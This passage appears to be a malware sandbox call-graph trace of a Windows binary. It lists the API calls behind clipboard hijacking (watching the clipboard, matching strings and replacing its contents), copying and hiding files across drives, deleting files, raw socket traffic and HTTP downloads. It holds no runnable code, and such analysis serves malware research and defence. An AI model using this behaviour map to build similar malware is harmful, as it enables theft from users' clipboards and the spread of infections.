5098 40de29 5096->5098 5097->5098 5098->5047 5098->5050 5100 40df10 2 API calls 5099->5100 5102 40e07b 5100->5102 5101 40de65 5101->5054 5101->5056 5102->5101 5108 40e0e0 5102->5108 5105 40df36 5104->5105 5106 40df70 2 API calls 5105->5106 5107 40df4d 5105->5107 5106->5107 5107->5047 5110 40e106 5108->5110 5109 40e21d 5109->5101 5110->5109 5111 40e193 lstrcmpiW 5110->5111 5112 40e213 SysFreeString 5111->5112 5113 40e1a6 5111->5113 5112->5109 5114 40df10 2 API calls 5113->5114 5116 40e1b4 5114->5116 5115 40e205 5115->5112 5116->5112 5116->5115 5117 40e1e3 lstrcmpiW 5116->5117 5118 40e1f5 5117->5118 5119 40e1fb SysFreeString 5117->5119 5118->5119 5119->5115 5124 40c96d 5120->5124 5121 40c910 _vscprintf wvsprintfA 5121->5124 5122 40c988 SysFreeString 5122->4976 5123 409fe0 9 API calls 5123->5124 5124->5121 5124->5122 5124->5123 5126 40aa6c socket 5125->5126 5127 40aa59 gethostbyname 5125->5127 5126->4982 5126->4983 5127->5126 5128->4982 5129->4989 5131 40e4c7 5130->5131 5132 40e594 InternetConnectA 5130->5132 5131->4995 5131->4996 5133 40e714 InternetCloseHandle 5132->5133 5134 40e5cd HttpOpenRequestA 5132->5134 5133->5131 5135 40e603 HttpAddRequestHeadersA HttpSendRequestA 5134->5135 5136 40e707 InternetCloseHandle 5134->5136 5137 40e6fa InternetCloseHandle 5135->5137 5138 40e64d 5135->5138 5136->5133 5137->5136 5139 40e664 InternetReadFile 5138->5139 5140 40e691 5138->5140 5141 409fe0 9 API calls 5138->5141 5139->5138 5139->5140 5140->5137 5142 40e6ac memcpy 5141->5142 5142->5138 5148 407067 5143->5148 5144 40723b 5146 407244 SysFreeString 5144->5146 5147 40700b SysFreeString 5144->5147 5145 40a1b0 _invalid_parameter 3 API calls 5145->5144 5146->5147 5147->4446 5149 4072c0 CoCreateInstance 5148->5149 5150 4071b6 SysAllocString 5148->5150 5151 407082 5148->5151 5149->5148 5150->5148 5150->5151 5151->5144 5151->5145 5153 40beca 5152->5153 5154 40bece 5152->5154 5153->4452 5156 40be80 CryptAcquireContextW 5154->5156 5157 40bebb 5156->5157 5158 40be9d CryptGenRandom CryptReleaseContext 5156->5158 5157->5153 5158->5157 5159->4465 5211 40add0 gethostname 5160->5211 5163 40aeb9 5163->4465 5165 40aecc strcmp 5165->5163 5166 40aee1 5165->5166 5215 40aa20 inet_ntoa 5166->5215 5168 40aeef strstr 5169 40af40 5168->5169 5170 40aeff 5168->5170 5218 40aa20 inet_ntoa 5169->5218 5216 40aa20 inet_ntoa 5170->5216 5173 40af4e strstr 5175 40af5e 5173->5175 5176 40af9f 5173->5176 5174 40af0d strstr 5174->5163 5177 40af1d 5174->5177 5219 40aa20 inet_ntoa 5175->5219 5221 40aa20 inet_ntoa 5176->5221 5217 40aa20 inet_ntoa 5177->5217 5181 40af6c strstr 5181->5163 5184 40af7c 5181->5184 5182 40afad strstr 5185 40afbd 5182->5185 5186 40affe EnterCriticalSection 5182->5186 5183 40af2b strstr 5183->5163 5183->5169 5220 40aa20 inet_ntoa 5184->5220 5222 40aa20 inet_ntoa 5185->5222 5187 40b016 5186->5187 5196 40b041 5187->5196 5224 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5187->5224 5190 40afcb strstr 5190->5163 5192 40afdb 5190->5192 5191 40af8a strstr 5191->5163 5191->5176 5223 40aa20 inet_ntoa 5192->5223 5195 40b13a LeaveCriticalSection 5195->5163 5196->5195 5198 409d90 7 API calls 5196->5198 5197 40afe9 strstr 5197->5163 5197->5186 5199 40b085 5198->5199 5199->5195 5225 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5199->5225 5201 40b0a3 5202 40b0d0 5201->5202 5203 40b0c6 Sleep 5201->5203 5205 40b0f5 5201->5205 5204 40a1b0 _invalid_parameter 3 API calls 5202->5204 5203->5201 5204->5205 5205->5195 5226 40ab80 5205->5226 5207->4480 5209 40ab80 14 API calls 5208->5209 5210 40ab73 LeaveCriticalSection 5209->5210 5210->4473 5212 40adf7 gethostbyname 5211->5212 5213 40ae13 5211->5213 5212->5213 5213->5163 5214 40aa20 inet_ntoa 5213->5214 5214->5165 5215->5168 5216->5174 5217->5183 5218->5173 5219->5181 5220->5191 5221->5182 5222->5190 5223->5197 5224->5196 5225->5201 5227 40ab94 5226->5227 5234 40ab8f 5226->5234 5228 409fa0 _invalid_parameter 7 API calls 5227->5228 5229 40aba8 5228->5229 5230 40ac04 CreateFileW 5229->5230 5229->5234 5231 40ac53 InterlockedExchange 5230->5231 5232 40ac27 WriteFile FlushFileBuffers CloseHandle 5230->5232 5233 40a1b0 _invalid_parameter 3 API calls 5231->5233 5232->5231 5233->5234 5234->5195 5236 40d25d 5235->5236 5237 40d193 5236->5237 5238 40d281 WaitForSingleObject 5236->5238 5237->4487 5237->4488 5238->5236 5239 40d29c CloseHandle 5238->5239 5239->5236 5243 407490 5240->5243 5241 4074b8 Sleep 5241->5243 5242 40756a Sleep 5242->5243 5243->5241 5243->5242 5244 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5243->5244 5246 40eae0 61 API calls 5243->5246 5270 40ea30 InternetOpenA 5244->5270 5246->5243 5248 405889 memset GetModuleHandleW 5247->5248 5249 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5248->5249 5249->5249 5250 405900 CreateWindowExW 5249->5250 5251 40592b 5250->5251 5252 40592d GetMessageA 5250->5252 5253 40595f ExitThread 5251->5253 5254 405941 TranslateMessage DispatchMessageA 5252->5254 5255 405957 5252->5255 5254->5252 5255->5248 5255->5253 5277 40e770 CreateFileW 5256->5277 5258 406bf0 5259 406d48 ExitThread 5258->5259 5261 406d38 Sleep 5258->5261 5262 406c29 5258->5262 5280 4063a0 GetLogicalDrives 5258->5280 5261->5258 5286 4062c0 5262->5286 5265 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5267 406cd6 wsprintfW 5265->5267 5268 406ceb wsprintfW 5265->5268 5266 406c5b 5267->5268 5292 4066b0 _chkstk 5268->5292 5271 40ea56 InternetOpenUrlA 5270->5271 5272 40eac8 Sleep 5270->5272 5273 40ea75 HttpQueryInfoA 5271->5273 5274 40eabe InternetCloseHandle 5271->5274 5272->5243 5275 40eab4 InternetCloseHandle 5273->5275 5276 40ea9e 5273->5276 5274->5272 5275->5274 5276->5275 5278 40e7b8 5277->5278 5279 40e79f GetFileSize CloseHandle 5277->5279 5278->5258 5279->5278 5285 4063cd 5280->5285 5281 406446 5281->5258 5282 4063dc RegOpenKeyExW 5283 4063fe RegQueryValueExW 5282->5283 5282->5285 5284 40643a RegCloseKey 5283->5284 5283->5285 5284->5285 5285->5281 5285->5282 5285->5284 5287 406319 5286->5287 5288 4062dc 5286->5288 5287->5265 5287->5266 5329 406320 GetDriveTypeW 5288->5329 5291 40630b lstrcpyW 5291->5287 5293 4066ce 6 API calls 5292->5293 5307 4066c7 5292->5307 5294 406782 5293->5294 5295 4067c4 PathFileExistsW 5293->5295 5296 40e770 3 API calls 5294->5296 5297 406874 PathFileExistsW 5295->5297 5298 4067d9 PathFileExistsW 5295->5298 5301 40678e 5296->5301 5299 406885 5297->5299 5300 4068ca FindFirstFileW 5297->5300 5302 406809 PathFileExistsW 5298->5302 5303 4067ea SetFileAttributesW DeleteFileW 5298->5303 5304 4068a5 5299->5304 5305 40688d 5299->5305 5300->5307 5327 4068f1 5300->5327 5301->5295 5306 4067a5 SetFileAttributesW DeleteFileW 5301->5306 5308 40681a CreateDirectoryW 5302->5308 5309 40683c PathFileExistsW 5302->5309 5303->5302 5311 406460 3 API calls 5304->5311 5334 406460 CoInitialize CoCreateInstance 5305->5334 5306->5295 5307->5266 5308->5309 5313 40682d SetFileAttributesW 5308->5313 5309->5297 5314 40684d CopyFileW 5309->5314 5315 4068a0 SetFileAttributesW 5311->5315 5312 4069b3 lstrcmpW 5316 4069c9 lstrcmpW 5312->5316 5312->5327 5313->5309 5314->5297 5317 406865 SetFileAttributesW 5314->5317 5315->5300 5316->5327 5317->5297 5319 406b8a FindNextFileW 5319->5312 5320 406ba6 FindClose 5319->5320 5320->5307 5321 406a0f lstrcmpiW 5321->5327 5322 406a76 PathMatchSpecW 5324 406a97 wsprintfW SetFileAttributesW DeleteFileW 5322->5324 5322->5327 5323 406af4 PathFileExistsW 5325 406b0a wsprintfW wsprintfW 5323->5325 5323->5327 5324->5327 5326 406b74 MoveFileExW 5325->5326 5325->5327 5326->5319 5327->5312 5327->5319 5327->5321 5327->5322 5327->5323 5338 406570 CreateDirectoryW wsprintfW FindFirstFileW 5327->5338 5330 4062ff 5329->5330 5331 406348 5329->5331 5330->5287 5330->5291 5331->5330 5332 40635c QueryDosDeviceW 5331->5332 5332->5330 5333 406376 StrCmpNW 5332->5333 5333->5330 5335 406496 5334->5335 5337 4064d2 5334->5337 5336 4064a0 wsprintfW 5335->5336 5335->5337 5336->5337 5337->5315 5339 4065c5 lstrcmpW 5338->5339 5340 40669f 5338->5340 5341 4065f1 5339->5341 5342 4065db lstrcmpW 5339->5342 5340->5327 5344 40666c FindNextFileW 5341->5344 5342->5341 5343 4065f3 wsprintfW wsprintfW 5342->5343 5343->5341 5345 406656 MoveFileExW 5343->5345 5344->5339 5346 406688 FindClose RemoveDirectoryW 5344->5346 5345->5344 5346->5340 5356 40d0d0 5361 401b60 5356->5361 5358 40d0e5 5359 40d104 5358->5359 5360 401b60 16 API calls 5358->5360 5360->5359 5362 401c42 5361->5362 5363 401b70 5361->5363 5362->5358 5363->5362 5364 409d90 7 API calls 5363->5364 5365 401b9d 5364->5365 5365->5362 5366 40a220 8 API calls 5365->5366 5367 401bc9 5366->5367 5368 401be6 5367->5368 5369 401bd6 5367->5369 5381 401ae0 WSASend 5368->5381 5370 40a1b0 _invalid_parameter 3 API calls 5369->5370 5372 401bdc 5370->5372 5372->5358 5373 401bf3 5374 401c33 5373->5374 5375 401bfc EnterCriticalSection 5373->5375 5378 40a1b0 _invalid_parameter 3 API calls 5374->5378 5376 401c13 5375->5376 5377 401c1f LeaveCriticalSection 5375->5377 5376->5377 5377->5358 5379 401c3c 5378->5379 5380 40a1b0 _invalid_parameter 3 API calls 5379->5380 5380->5362 5382 401b50 5381->5382 5383 401b12 WSAGetLastError 5381->5383 5382->5373 5383->5382 5384 401b1f 5383->5384 5385 401b56 5384->5385 5386 401b26 Sleep WSASend 5384->5386 5385->5373 5386->5382 5386->5383 5387 40d4d0 5390 40b570 5387->5390 5400 40b581 5390->5400 5392 40b59f 5394 40a1b0 _invalid_parameter 3 API calls 5392->5394 5395 40b94f 5394->5395 5396 40b960 21 API calls 5396->5400 5399 40b520 13 API calls 5399->5400 5400->5392 5400->5396 5400->5399 5401 40ae80 32 API calls 5400->5401 5404 40bab0 5400->5404 5411 40b250 EnterCriticalSection 5400->5411 5416 406e90 5400->5416 5421 406f30 5400->5421 5426 406d60 5400->5426 5433 406e60 5400->5433 5401->5400 5405 40bac1 lstrlenA 5404->5405 5406 40c190 7 API calls 5405->5406 5410 40badf 5406->5410 5407 40baeb 5408 40bb6f 5407->5408 5409 40a1b0 _invalid_parameter 3 API calls 5407->5409 5408->5400 5409->5408 5410->5405 5410->5407 5412 40b268 5411->5412 5413 40b2a4 LeaveCriticalSection 5412->5413 5436 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5412->5436 5413->5400 5415 40b293 5415->5413 5437 406ed0 5416->5437 5419 406ec9 5419->5400 5420 40d160 17 API calls 5420->5419 5422 406ed0 75 API calls 5421->5422 5423 406f4f 5422->5423 5424 406f7c 5423->5424 5452 406f90 5423->5452 5424->5400 5463 405fa0 EnterCriticalSection 5426->5463 5428 406d7a 5432 406dad 5428->5432 5468 406dc0 5428->5468 5431 40a1b0 _invalid_parameter 3 API calls 5431->5432 5432->5400 5475 406060 EnterCriticalSection 5433->5475 5435 406e82 5435->5400 5436->5415 5438 406ee3 5437->5438 5440 406ea4 5438->5440 5441 405eb0 EnterCriticalSection 5438->5441 5440->5419 5440->5420 5442 40c820 71 API calls 5441->5442 5443 405ece 5442->5443 5444 405f8b LeaveCriticalSection 5443->5444 5445 405ee7 5443->5445 5448 405f08 5443->5448 5444->5438 5446 405ef1 memcpy 5445->5446 5451 405f06 5445->5451 5446->5451 5447 40a1b0 _invalid_parameter 3 API calls 5449 405f88 5447->5449 5450 405f66 memcpy 5448->5450 5448->5451 5449->5444 5450->5451 5451->5447 5455 40b480 5452->5455 5456 40bf00 3 API calls 5455->5456 5457 40b48b 5456->5457 5458 40b4a7 lstrlenA 5457->5458 5459 40c190 7 API calls 5458->5459 5460 40b4dd 5459->5460 5461 40a1b0 _invalid_parameter 3 API calls 5460->5461 5462 406fd5 5460->5462 5461->5462 5462->5424 5464 405fbe 5463->5464 5465 40604a LeaveCriticalSection 5464->5465 5466 40a220 8 API calls 5464->5466 5465->5428 5467 40601c 5466->5467 5467->5465 5469 409fa0 _invalid_parameter 7 API calls 5468->5469 5470 406dd2 memcpy 5469->5470 5471 40b480 13 API calls 5470->5471 5472 406e3c 5471->5472 5473 40a1b0 _invalid_parameter 3 API calls 5472->5473 5474 406da1 5473->5474 5474->5431 5500 40c880 5475->5500 5478 4062a3 LeaveCriticalSection 5478->5435 5479 40c820 71 API calls 5481 406099 5479->5481 5480 4061b8 5483 4061e1 5480->5483 5486 405cf0 74 API calls 5480->5486 5481->5478 5481->5480 5482 4060f4 memcpy 5481->5482 5484 40a1b0 _invalid_parameter 3 API calls 5482->5484 5485 40a1b0 _invalid_parameter 3 API calls 5483->5485 5487 406118 5484->5487 5488 406202 5485->5488 5486->5483 5489 40a220 8 API calls 5487->5489 5488->5478 5490 406211 CreateFileW 5488->5490 5491 406128 5489->5491 5490->5478 5492 406234 5490->5492 5493 40a1b0 _invalid_parameter 3 API calls 5491->5493 5495 406251 WriteFile 5492->5495 5496 40628f FlushFileBuffers CloseHandle 5492->5496 5494 40614f 5493->5494 5497 40c190 7 API calls 5494->5497 5495->5492 5496->5478 5498 406185 5497->5498 5499 407310 70 API calls 5498->5499 5499->5480 5503 40bdd0 5500->5503 5508 40bde1 5503->5508 5504 40a220 8 API calls 5504->5508 5505 40bdfb 5507 40a1b0 _invalid_parameter 3 API calls 5505->5507 5506 40bd30 70 API calls 5506->5508 5509 406082 5507->5509 5508->5504 5508->5505 5508->5506 5510 407af0 68 API calls 5508->5510 5511 40be3b memcmp 5508->5511 5509->5478 5509->5479 5510->5508 5511->5505 5511->5508 5512 40cf50 5513 40cfbe 5512->5513 5514 40cf66 5512->5514 5514->5513 5515 40cf70 5514->5515 5516 40cfc3 5514->5516 5517 40d013 5514->5517 5520 409d90 7 API calls 5515->5520 5518 40cfe8 5516->5518 5519 40cfdb InterlockedDecrement 5516->5519 5546 40bbc0 5517->5546 5522 40a1b0 _invalid_parameter 3 API calls 5518->5522 5519->5518 5523 40cf7d 5520->5523 5524 40cff4 5522->5524 5535 4023d0 5523->5535 5526 40a1b0 _invalid_parameter 3 API calls 5524->5526 5526->5513 5530 40cfab InterlockedIncrement 5530->5513 5532 40d071 IsBadReadPtr 5534 40d039 5532->5534 5533 40b570 193 API calls 5533->5534 5534->5513 5534->5532 5534->5533 5551 40bcc0 5534->5551 5536 402413 5535->5536 5537 4023d9 5535->5537 5539 40ad40 5536->5539 5537->5536 5538 4023ea InterlockedIncrement 5537->5538 5538->5536 5540 40add0 2 API calls 5539->5540 5541 40ad4f 5540->5541 5542 40ad59 5541->5542 5543 40ad5d EnterCriticalSection 5541->5543 5542->5513 5542->5530 5544 40ad7c LeaveCriticalSection 5543->5544 5544->5542 5547 40bbd3 5546->5547 5548 40bbfd memcpy 5546->5548 5549 409fe0 9 API calls 5547->5549 5548->5534 5550 40bbf4 5549->5550 5550->5548 5552 40bce9 5551->5552 5553 40bcde 5551->5553 5552->5553 5554 40bd01 memmove 5552->5554 5553->5534 5554->5553 5555 401f50 GetQueuedCompletionStatus 5556 401f92 5555->5556 5557 402008 5555->5557 5558 401f97 WSAGetOverlappedResult 5556->5558 5562 401d60 5556->5562 5558->5556 5559 401fb9 WSAGetLastError 5558->5559 5559->5556 5561 401fd3 GetQueuedCompletionStatus 5561->5556 5561->5557 5563 401ef2 InterlockedDecrement setsockopt closesocket 5562->5563 5564 401d74 5562->5564 5566 401e39 5563->5566 5564->5563 5565 401d7c 5564->5565 5582 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5565->5582 5566->5561 5568 401d81 InterlockedExchange 5569 401d98 5568->5569 5570 401e4e 5568->5570 5569->5566 5575 401da9 InterlockedDecrement 5569->5575 5576 401dbc InterlockedDecrement InterlockedExchangeAdd 5569->5576 5571 401e67 5570->5571 5572 401e57 InterlockedDecrement 5570->5572 5573 401e72 5571->5573 5574 401e87 InterlockedDecrement 5571->5574 5572->5561 5577 401ae0 4 API calls 5573->5577 5578 401ee9 5574->5578 5575->5561 5579 401e2f 5576->5579 5580 401e7e 5577->5580 5578->5561 5583 401cf0 5579->5583 5580->5561 5582->5568 5584 401d00 InterlockedExchangeAdd 5583->5584 5585 401cfc 5583->5585 5586 401d53 5584->5586 5587 401d17 InterlockedIncrement 5584->5587 5585->5566 5586->5566 5591 401c50 WSARecv 5587->5591 5589 401d46 5589->5586 5590 401d4c InterlockedDecrement 5589->5590 5590->5586 5592 401cd2 5591->5592 5593 401c8e 5591->5593 5592->5589 5594 401c90 WSAGetLastError 5593->5594 5595 401ca4 Sleep WSARecv 5593->5595 5596 401cdb 5593->5596 5594->5592 5594->5593 5595->5592 5595->5594 5596->5589 5597 40d550 5607 4013b0 5597->5607 5599 40d5dd 5601 40d577 InterlockedExchangeAdd 5602 40d5bb WaitForSingleObject 5601->5602 5603 40d55d 5601->5603 5602->5603 5604 40d5d4 5602->5604 5603->5599 5603->5601 5603->5602 5619 40b200 EnterCriticalSection 5603->5619 5624 40b520 5603->5624 5627 401330 5604->5627 5608 409d90 7 API calls 5607->5608 5609 4013bb CreateEventA socket 5608->5609 5610 4013f2 5609->5610 5616 4013f8 5609->5616 5613 401330 8 API calls 5610->5613 5611 401401 bind 5614 401444 CreateThread 5611->5614 5615 401434 5611->5615 5612 401462 5612->5603 5613->5616 5614->5612 5637 401100 5614->5637 5617 401330 8 API calls 5615->5617 5616->5611 5616->5612 5618 40143a 5617->5618 5618->5603 5620 40b237 LeaveCriticalSection 5619->5620 5621 40b21f 5619->5621 5620->5603 5622 40bec0 3 API calls 5621->5622 5623 40b22a 5622->5623 5623->5620 5625 40b480 13 API calls 5624->5625 5626 40b561 5625->5626 5626->5603 5628 401339 5627->5628 5635 40139b 5627->5635 5629 401341 SetEvent WaitForSingleObject CloseHandle 5628->5629 5628->5635 5630 401369 5629->5630 5636 40138b 5629->5636 5634 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5630->5634 5630->5636 5632 401395 5633 40a1b0 _invalid_parameter 3 API calls 5632->5633 5633->5635 5634->5630 5635->5599 5666 40ab40 shutdown closesocket 5636->5666 5638 401115 ioctlsocket 5637->5638 5639 4011e4 5638->5639 5645 40113a 5638->5645 5640 40a1b0 _invalid_parameter 3 API calls 5639->5640 5642 4011ea 5640->5642 5641 4011cd WaitForSingleObject 5641->5638 5641->5639 5643 409fe0 9 API calls 5643->5645 5644 401168 recvfrom 5644->5641 5644->5645 5645->5641 5645->5643 5645->5644 5646 4011ad InterlockedExchangeAdd 5645->5646 5648 401000 5646->5648 5649 401014 5648->5649 5650 40103b 5649->5650 5652 409d90 7 API calls 5649->5652 5659 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5650->5659 5652->5650 5653 40105b 5660 401580 5653->5660 5655 4010ec 5655->5645 5656 4010a3 IsBadReadPtr 5658 401071 5656->5658 5657 4010d8 memmove 5657->5658 5658->5655 5658->5656 5658->5657 5659->5653 5661 401592 5660->5661 5662 4015a5 memcpy 5660->5662 5663 409fe0 9 API calls 5661->5663 5664 4015c1 5662->5664 5665 40159f 5663->5665 5664->5658 5665->5662 5666->5632 5891 40ca90 5892 40ad40 4 API calls 5891->5892 5893 40caa3 5892->5893 5894 40caba 5893->5894 5896 40cad0 InterlockedExchangeAdd 5893->5896 5897 40caed 5896->5897 5907 40cae6 5896->5907 5913 40cdc0 5897->5913 5900 40cb0d InterlockedIncrement 5910 40cb17 5900->5910 5901 40b520 13 API calls 5901->5910 5902 40cb40 5920 40aa20 inet_ntoa 5902->5920 5904 40cb4c 5905 40cc10 InterlockedDecrement 5904->5905 5921 40ab40 shutdown closesocket 5905->5921 5907->5894 5908 409fa0 _invalid_parameter 7 API calls 5908->5910 5909 40ccf0 6 API calls 5909->5910 5910->5901 5910->5902 5910->5905 5910->5908 5910->5909 5911 40b570 193 API calls 5910->5911 5912 40a1b0 _invalid_parameter 3 API calls 5910->5912 5911->5910 5912->5910 5914 40cdcd socket 5913->5914 5915 40cde2 htons connect 5914->5915 5916 40ce3f 5914->5916 5915->5916 5917 40ce2a 5915->5917 5916->5914 5918 40cafd 5916->5918 5922 40ab40 shutdown closesocket 5917->5922 5918->5900 5918->5907 5920->5904 5921->5907 5922->5918 5923 406c16 5927 406bf8 5923->5927 5924 406d38 Sleep 5924->5927 5925 406c29 5926 4062c0 4 API calls 5925->5926 5928 406c3a 5926->5928 5927->5924 5927->5925 5929 406d48 ExitThread 5927->5929 5931 4063a0 4 API calls 5927->5931 5930 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5928->5930 5932 406c5b 5928->5932 5933 406cd6 wsprintfW 5930->5933 5934 406ceb wsprintfW 5930->5934 5931->5927 5933->5934 5935 4066b0 52 API calls 5934->5935 5935->5932 5936 40b420 5937 40b423 WaitForSingleObject 5936->5937 5938 40b451 5937->5938 5939 40b43b InterlockedDecrement 5937->5939 5940 40b44a 5939->5940 5940->5937 5941 40ab60 16 API calls 5940->5941 5941->5940 5942 401920 GetTickCount WaitForSingleObject 5943 401ac9 5942->5943 5944 40194d WSAWaitForMultipleEvents 5942->5944 5945 4019f0 GetTickCount 5944->5945 5946 40196a WSAEnumNetworkEvents 5944->5946 5947 401a43 GetTickCount 5945->5947 5948 401a05 EnterCriticalSection 5945->5948 5946->5945 5957 401983 5946->5957 5949 401ab5 WaitForSingleObject 5947->5949 5950 401a4e EnterCriticalSection 5947->5950 5951 401a16 5948->5951 5952 401a3a LeaveCriticalSection 5948->5952 5949->5943 5949->5944 5954 401aa1 LeaveCriticalSection GetTickCount 5950->5954 5955 401a5f InterlockedExchangeAdd 5950->5955 5959 401a29 LeaveCriticalSection 5951->5959 5984 401820 5951->5984 5952->5949 5953 401992 accept 5953->5945 5953->5957 5954->5949 6002 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5955->6002 5957->5945 5957->5953 5963 401cf0 7 API calls 5957->5963 5964 4022c0 5957->5964 5959->5949 5961 401a72 5961->5954 5961->5955 6003 40ab40 shutdown closesocket 5961->6003 5963->5945 5965 4022d2 EnterCriticalSection 5964->5965 5966 4022cd 5964->5966 5967 4022e7 5965->5967 5968 4022fd LeaveCriticalSection 5965->5968 5966->5957 5967->5968 5969 402308 5968->5969 5970 40230f 5968->5970 5969->5957 5971 409d90 7 API calls 5970->5971 5972 402319 5971->5972 5973 402326 getpeername CreateIoCompletionPort 5972->5973 5974 4023b8 5972->5974 5975 4023b2 5973->5975 5976 402366 5973->5976 6006 40ab40 shutdown closesocket 5974->6006 5980 40a1b0 _invalid_parameter 3 API calls 5975->5980 6004 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5976->6004 5978 4023c3 5978->5957 5980->5974 5981 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6005 4021e0 EnterCriticalSection LeaveCriticalSection 5981->6005 5983 4023ab 5983->5957 5985 401830 5984->5985 5994 40190f 5984->5994 5986 40183d InterlockedExchangeAdd 5985->5986 5985->5994 5987 401854 5986->5987 5986->5994 5988 401880 5987->5988 5987->5994 6007 4017a0 EnterCriticalSection 5987->6007 5992 401891 5988->5992 6016 40ab40 shutdown closesocket 5988->6016 5991 4018a7 InterlockedDecrement 5993 401901 5991->5993 5992->5991 5992->5993 5995 402247 5993->5995 5996 402265 EnterCriticalSection 5993->5996 5994->5952 5995->5952 5997 40229c LeaveCriticalSection DeleteCriticalSection 5996->5997 6000 40227d 5996->6000 5998 40a1b0 _invalid_parameter 3 API calls 5997->5998 5998->5995 5999 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5999->6000 6000->5999 6001 40229b 6000->6001 6001->5997 6002->5961 6003->5961 6004->5981 6005->5983 6006->5978 6008 401807 LeaveCriticalSection 6007->6008 6009 4017ba InterlockedExchangeAdd 6007->6009 6008->5987 6010 4017ca LeaveCriticalSection 6009->6010 6011 4017d9 6009->6011 6010->5987 6012 40a1b0 _invalid_parameter 3 API calls 6011->6012 6013 4017fe 6012->6013 6014 40a1b0 _invalid_parameter 3 API calls 6013->6014 6015 401804 6014->6015 6015->6008 6016->5992 6017 40d520 6020 401200 6017->6020 6019 40d542 6021 401314 6020->6021 6022 40121d 6020->6022 6021->6019 6022->6021 6023 409fa0 _invalid_parameter 7 API calls 6022->6023 6024 401247 memcpy htons 6023->6024 6025 4012ed 6024->6025 6026 401297 sendto 6024->6026 6027 40a1b0 _invalid_parameter 3 API calls 6025->6027 6028 4012b6 InterlockedExchangeAdd 6026->6028 6029 4012e9 6026->6029 6030 4012fc 6027->6030 6028->6026 6031 4012cc 6028->6031 6029->6025 6032 40130a 6029->6032 6030->6019 6034 40a1b0 _invalid_parameter 3 API calls 6031->6034 6033 40a1b0 _invalid_parameter 3 API calls 6032->6033 6033->6021 6035 4012db 6034->6035 6035->6019 6036 40e121 6038 40e12a 6036->6038 6037 40e21d 6038->6037 6039 40e193 lstrcmpiW 6038->6039 6040 40e213 SysFreeString 6039->6040 6041 40e1a6 6039->6041 6040->6037 6042 40df10 2 API calls 6041->6042 6043 40e1b4 6042->6043 6043->6040 6044 40e205 6043->6044 6045 40e1e3 lstrcmpiW 6043->6045 6044->6040 6046 40e1f5 6045->6046 6047 40e1fb SysFreeString 6045->6047 6046->6047 6047->6044 5681 405970 GetWindowLongW 5682 405994 5681->5682 5683 4059b6 5681->5683 5684 4059a1 5682->5684 5685 405a27 IsClipboardFormatAvailable 5682->5685 5686 4059b1 5683->5686 5690 405a06 5683->5690 5691 4059ee SetWindowLongW 5683->5691 5687 4059c4 SetClipboardViewer SetWindowLongW 5684->5687 5688 4059a7 5684->5688 5692 405a43 IsClipboardFormatAvailable 5685->5692 5693 405a3a 5685->5693 5689 405ba4 DefWindowProcA 5686->5689 5687->5689 5688->5686 5694 405b5d RegisterRawInputDevices ChangeClipboardChain 5688->5694 5690->5686 5695 405a0c SendMessageA 5690->5695 5691->5686 5692->5693 5696 405a58 IsClipboardFormatAvailable 5692->5696 5697 405a75 OpenClipboard 5693->5697 5715 405b3c 5693->5715 5694->5689 5695->5686 5696->5693 5698 405a85 GetClipboardData 5697->5698 5697->5715 5698->5686 5700 405a9d GlobalLock 5698->5700 5699 405b45 SendMessageA 5699->5686 5700->5686 5701 405ab5 5700->5701 5702 405ac8 5701->5702 5703 405ae9 5701->5703 5705 405afe 5702->5705 5706 405ace 5702->5706 5704 405690 13 API calls 5703->5704 5707 405ad4 GlobalUnlock CloseClipboard 5704->5707 5722 4057b0 5705->5722 5706->5707 5716 405570 5706->5716 5711 405b27 5707->5711 5707->5715 5730 404970 lstrlenW 5711->5730 5714 40a1b0 _invalid_parameter 3 API calls 5714->5715 5715->5686 5715->5699 5717 40557b 5716->5717 5718 405581 lstrlenW 5717->5718 5719 405594 5717->5719 5720 409fa0 _invalid_parameter 7 API calls 5717->5720 5721 4055b1 lstrcpynW 5717->5721 5718->5717 5718->5719 5719->5707 5720->5717 5721->5717 5721->5719 5727 4057bd 5722->5727 5723 4057c3 lstrlenA 5723->5727 5728 4057d6 5723->5728 5724 405630 2 API calls 5724->5727 5725 409fa0 _invalid_parameter 7 API calls 5725->5727 5727->5723 5727->5724 5727->5725 5727->5728 5729 40a1b0 _invalid_parameter 3 API calls 5727->5729 5764 405760 5727->5764 5728->5707 5729->5727 5733 4049a4 5730->5733 5731 404bee 5731->5714 5732 404dbb StrStrW 5735 404dd2 StrStrW 5732->5735 5736 404dce 5732->5736 5733->5731 5734 404c00 5733->5734 5741 404d30 StrStrW 5733->5741 5734->5731 5734->5732 5737 404de5 5735->5737 5738 404de9 StrStrW 5735->5738 5736->5735 5737->5738 5739 404dfc 5738->5739 5746 404e12 5739->5746 5769 4048a0 lstrlenW 5739->5769 5741->5734 5742 404d58 StrStrW 5741->5742 5742->5734 5743 404d80 StrStrW 5742->5743 5743->5734 5744 40539b StrStrW 5745 4053b7 StrStrW 5744->5745 5749 4053ae StrStrW 5744->5749 5747 4053d3 StrStrW 5745->5747 5745->5749 5746->5731 5746->5744 5746->5749 5747->5749 5750 405470 StrStrW 5749->5750 5751 405469 5749->5751 5752 405483 5750->5752 5753 40548a StrStrW 5750->5753 5751->5750 5752->5753 5754 4054a4 StrStrW 5753->5754 5755 40549d 5753->5755 5756 4054b7 5754->5756 5757 4054be StrStrW 5754->5757 5755->5754 5756->5757 5758 4054d1 5757->5758 5759 4054d8 lstrlenA 5757->5759 5758->5759 5759->5731 5760 4054eb GlobalAlloc 5759->5760 5760->5731 5761 405506 GlobalLock 5760->5761 5761->5731 5762 405519 memcpy GlobalUnlock OpenClipboard 5761->5762 5762->5731 5763 405546 EmptyClipboard SetClipboardData CloseClipboard 5762->5763 5763->5731 5765 40576b 5764->5765 5766 405771 lstrlenA 5765->5766 5767 405630 2 API calls 5765->5767 5768 